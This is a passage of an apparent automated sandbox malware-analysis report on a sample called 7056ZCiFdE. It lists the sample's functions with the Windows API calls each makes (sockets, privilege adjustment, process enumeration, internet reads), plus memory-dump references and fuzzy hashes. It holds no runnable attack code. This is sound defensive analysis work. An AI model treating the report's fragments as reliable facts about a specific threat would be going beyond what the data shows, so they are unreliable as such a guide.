                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                    • String ID:
                                    • API String ID: 2387731787-0
                                    • Opcode ID: 262074c2a64a85dc3b236872332b6bc04fcad956084e634bef2f74d6bb9f40a6
                                    • Instruction ID: e65107c4dfa091f396df04d46af9671c5388dbb2b93b26a2ff85b4093ca3c164
                                    • Opcode Fuzzy Hash: 262074c2a64a85dc3b236872332b6bc04fcad956084e634bef2f74d6bb9f40a6
                                    • Instruction Fuzzy Hash: B0517C356046429FD714DF69D890EAAB3E8FF4A324F14462DE956C73A1DB30ED04CB92
                                    Function 008F6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008F7D8B: inet_addr.WS2_32(00000000), ref: 008F7DB6
                                    • socket.WS2_32(00000002,00000002,00000011), ref: 008F679E
                                    • WSAGetLastError.WS2_32(00000000), ref: 008F67C7
                                    • bind.WS2_32(00000000,?,00000010), ref: 008F6800
                                    • WSAGetLastError.WS2_32(00000000), ref: 008F680D
                                    • closesocket.WS2_32(00000000), ref: 008F6821
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                    • String ID:
                                    • API String ID: 99427753-0
                                    • Opcode ID: 5f69e8bd94acf70717cb917250a638d57a8a577d518cdfccbf12c18ba691acab
                                    • Instruction ID: de4380ebf01ddcfb4ef4ede5c35dcdd88937a33cd486c5bfdab164a336835cae
                                    • Opcode Fuzzy Hash: 5f69e8bd94acf70717cb917250a638d57a8a577d518cdfccbf12c18ba691acab
                                    • Instruction Fuzzy Hash: AE41C575640214AFDB50BF288C86F7E77A8FB09714F44856CFA5AEB3C2DA709D009792
                                    Function 00905376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                    • String ID:
                                    • API String ID: 292994002-0
                                    • Opcode ID: 883f8c76d15a10d7e303d448095a31ce265c42e3133c8b32d0d9bf58265e2526
                                    • Instruction ID: 2d533eae94bd59bf72f72c47cd6772b20ee3d4555c5206338d27abaebb5c3463
                                    • Opcode Fuzzy Hash: 883f8c76d15a10d7e303d448095a31ce265c42e3133c8b32d0d9bf58265e2526
                                    • Instruction Fuzzy Hash: 1B11B231300915AFEB316F269C58A6BBB9DFF847A1B464439F846D3291CBB09D018AA5
                                    Function 008D80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008D80C0
                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008D80CA
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008D80D9
                                    • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008D80E0
                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008D80F6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 47921759-0
                                    • Opcode ID: 638cc2f822a088edf63282e6d9aa93387a5acd89981c49a38edb07dcab908b25
                                    • Instruction ID: 0f362c944ebbf53d4691500aadc92de2e8b4210b38b620fb05e9690ce489ee18
                                    • Opcode Fuzzy Hash: 638cc2f822a088edf63282e6d9aa93387a5acd89981c49a38edb07dcab908b25
                                    • Instruction Fuzzy Hash: 66F06231258304EFEB304FA5EC9DE673BBCFF49B55B000126F945C6250CB619D45EA60
                                    Function 008EC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 008EC432
                                    • CoCreateInstance.COMBASE(00912D6C,00000000,00000001,00912BDC,?), ref: 008EC44A
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                    • CoUninitialize.COMBASE ref: 008EC6B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                    • String ID: .lnk
                                    • API String ID: 2683427295-24824748
                                    • Opcode ID: da8fdfb31c23ec96ed74efb5f7df8b62c1472fec3e0ad0574e74989cbaf300dc
                                    • Instruction ID: 0a0011339245e6b1af583bfd28cfc57398f5803d6651b8a014c14d5705513cce
                                    • Opcode Fuzzy Hash: da8fdfb31c23ec96ed74efb5f7df8b62c1472fec3e0ad0574e74989cbaf300dc
                                    • Instruction Fuzzy Hash: 36A14C71104205AFD700EF58C881EABB7E8FF95358F04492CF596D71A2DB71EA49CB62
                                    Function 00893030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __itow__swprintf
                                    • String ID:
                                    • API String ID: 674341424-0
                                    • Opcode ID: df8712b47c7d0f2ae2e0357c4b8b930ebf02376c73ad8866e6391acd05616ba2
                                    • Instruction ID: ea28380fb00796da80b5f25d1b24dde1061cdb019b9013db87a6ae89dc218868
                                    • Opcode Fuzzy Hash: df8712b47c7d0f2ae2e0357c4b8b930ebf02376c73ad8866e6391acd05616ba2
                                    • Instruction Fuzzy Hash: E92247716083019FDB24EF18C881B6AB7E4FB85714F18492DF99AD7291EB71E904CB93
                                    Function 008FEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 008FEE3D
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 008FEE4B
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                    • Process32NextW.KERNEL32(00000000,?), ref: 008FEF0B
                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 008FEF1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                    • String ID:
                                    • API String ID: 2576544623-0
                                    • Opcode ID: 0df636e446b7689932464add3768ff5157b1aca2f14b364ca62f658e03eab0ea
                                    • Instruction ID: 8ddacf1af440c6e2e8ab331496cefb582d32d8a1b0b5d3156b8628f67b1baa1f
                                    • Opcode Fuzzy Hash: 0df636e446b7689932464add3768ff5157b1aca2f14b364ca62f658e03eab0ea
                                    • Instruction Fuzzy Hash: D4515B71508715AFD320EF28DC85E6BBBE8FF94710F50482DF595D62A1EB70A908CB92
                                    Function 0090C498 Relevance: 6.1, APIs: 4, Instructions: 83nativewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • GetCursorPos.USER32(?), ref: 0090C4D2
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,008BB9AB,?,?,?,?,?), ref: 0090C4E7
                                    • GetCursorPos.USER32(?), ref: 0090C534
                                    • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,008BB9AB,?,?,?), ref: 0090C56E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                    • String ID:
                                    • API String ID: 1423138444-0
                                    • Opcode ID: c74dd2b9948b70b11783794eadd6e66d78066a3f7f161f83d639198e3a9f2639
                                    • Instruction ID: 45d7bcf77c9b73a44cd6d4680d3dd73da8b754bc65ae31b4f3848d17a6c69212
                                    • Opcode Fuzzy Hash: c74dd2b9948b70b11783794eadd6e66d78066a3f7f161f83d639198e3a9f2639
                                    • Instruction Fuzzy Hash: 79317379614058AFCB25CF98CC68EBA7BB9FB09310F444265F905CB2A1C731AD51EBA4
                                    Function 00881290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 008812D8
                                    • GetClientRect.USER32(?,?), ref: 008BB5FB
                                    • GetCursorPos.USER32(?), ref: 008BB605
                                    • ScreenToClient.USER32(?,?), ref: 008BB610
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                    • String ID:
                                    • API String ID: 1010295502-0
                                    • Opcode ID: f8ec66eb99888a466ecc126e3b0692c9eebe762d6d3d2e35dd2c7cc6e1650f35
                                    • Instruction ID: f2823bc9d03ad61c51a0477cfdb5e60f8611ca2257989150a9fc7ba08d33ec90
                                    • Opcode Fuzzy Hash: f8ec66eb99888a466ecc126e3b0692c9eebe762d6d3d2e35dd2c7cc6e1650f35
                                    • Instruction Fuzzy Hash: 7911E335A14119AFCF10EFA8D8899AE77B8FB05311F500466F901E7251DB30BA529BA6
                                    Function 008DE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008DE628
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: ($|
                                    • API String ID: 1659193697-1631851259
                                    • Opcode ID: 1a451526a6ed1f666b65ac05a965ea52d620542cf27db89fc070436c33abac5a
                                    • Instruction ID: 73302ca820e0a8bb414e234dbb0da7261703471f84c55f381ece2c0b25667ae3
                                    • Opcode Fuzzy Hash: 1a451526a6ed1f666b65ac05a965ea52d620542cf27db89fc070436c33abac5a
                                    • Instruction Fuzzy Hash: E1323575A007059FDB28DF19D4819AAB7F0FF58320B15C56EE89ADB3A1E770E941CB40
                                    Function 008F22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008F180A,00000000), ref: 008F23E1
                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 008F2418
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Internet$AvailableDataFileQueryRead
                                    • String ID:
                                    • API String ID: 599397726-0
                                    • Opcode ID: 8944eb57b5ba910de0515375a6d47541768b33fc0be810aa70e8642676296efe
                                    • Instruction ID: 25bec455350024ec351f5a7a8530550d35e2dd3003ecd833a75bb4cdf2d25c41
                                    • Opcode Fuzzy Hash: 8944eb57b5ba910de0515375a6d47541768b33fc0be810aa70e8642676296efe
                                    • Instruction Fuzzy Hash: 4241C5B190420DBFEB20DEB5DC85EBBB7BCFB40328F10406AF701E6650DAB59E419A55
                                    Function 008EB3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 008EB40B
                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 008EB465
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 008EB4B2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DiskFreeSpace
                                    • String ID:
                                    • API String ID: 1682464887-0
                                    • Opcode ID: d18eb41b66da20345cdd28028ee8e3b26d4678df490c2a5f8df088f0f3f4d9eb
                                    • Instruction ID: c8fce4a3ab97bf3825eaff1446eb64a80bc06176ddac1e00cec5b2a056626943
                                    • Opcode Fuzzy Hash: d18eb41b66da20345cdd28028ee8e3b26d4678df490c2a5f8df088f0f3f4d9eb
                                    • Instruction Fuzzy Hash: 35217135A10108EFCB00EFA9D884AEEBBB8FF49314F1480A9E945EB351DB319955DB51
                                    Function 008D87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008A0DB6: std::exception::exception.LIBCMT ref: 008A0DEC
                                      • Part of subcall function 008A0DB6: __CxxThrowException@8.LIBCMT ref: 008A0E01
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D882B
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8858
                                    • GetLastError.KERNEL32 ref: 008D8865
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                    • String ID:
                                    • API String ID: 1922334811-0
                                    • Opcode ID: 7c0d0bee7c26a604fbf3aaf863fcad5b4ab024a368845a35c64fb5dff2a03a54
                                    • Instruction ID: 3ffe46aafecf219ed5c28160484ee25aff6db7c6d23d8837c56b7698d25a27b3
                                    • Opcode Fuzzy Hash: 7c0d0bee7c26a604fbf3aaf863fcad5b4ab024a368845a35c64fb5dff2a03a54
                                    • Instruction Fuzzy Hash: 65116DB2814204AFE728EFA8DC85D6BB7BDFB45710B20862EE45597741EA30BC409B60
                                    Function 008D874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008D8774
                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008D878B
                                    • FreeSid.ADVAPI32(?), ref: 008D879B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                    • String ID:
                                    • API String ID: 3429775523-0
                                    • Opcode ID: d982a7c5f710d9e629aa4990ea8f950002fbadc95e4ced80489891e6ea7625ae
                                    • Instruction ID: 0f15454a1f9baefe0dc69e1052b3aa1acff4d23206efafcb67ac788050c62052
                                    • Opcode Fuzzy Hash: d982a7c5f710d9e629aa4990ea8f950002fbadc95e4ced80489891e6ea7625ae
                                    • Instruction Fuzzy Hash: 5EF04975A1130CBFDF00DFF4DC99AAEBBBCEF08701F1044A9A901E2681E6716B049B50
                                    Function 008816DE Relevance: 3.1, APIs: 2, Instructions: 83nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                      • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                    • GetParent.USER32(?), ref: 008BB7BA
                                    • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,008819B3,?,?,?,00000006,?), ref: 008BB834
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: LongWindow$DialogNtdllParentProc_
                                    • String ID:
                                    • API String ID: 314495775-0
                                    • Opcode ID: fb1d5d658cf151d02a80cd7213ee81fd99b38b735bfc7d30e049452cb02196e3
                                    • Instruction ID: 75a5694c843e690032695a0bf0c31eb7f47f79a9a4d76c86e5aa682abc4d94af
                                    • Opcode Fuzzy Hash: fb1d5d658cf151d02a80cd7213ee81fd99b38b735bfc7d30e049452cb02196e3
                                    • Instruction Fuzzy Hash: D5219134205508AFCF20AB68C888DA93B9AFB4A324F544264F525DB3B6CB719D12DB50
                                    Function 008EC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 008EC6FB
                                    • FindClose.KERNEL32(00000000), ref: 008EC72B
                                    Memory Dump Source
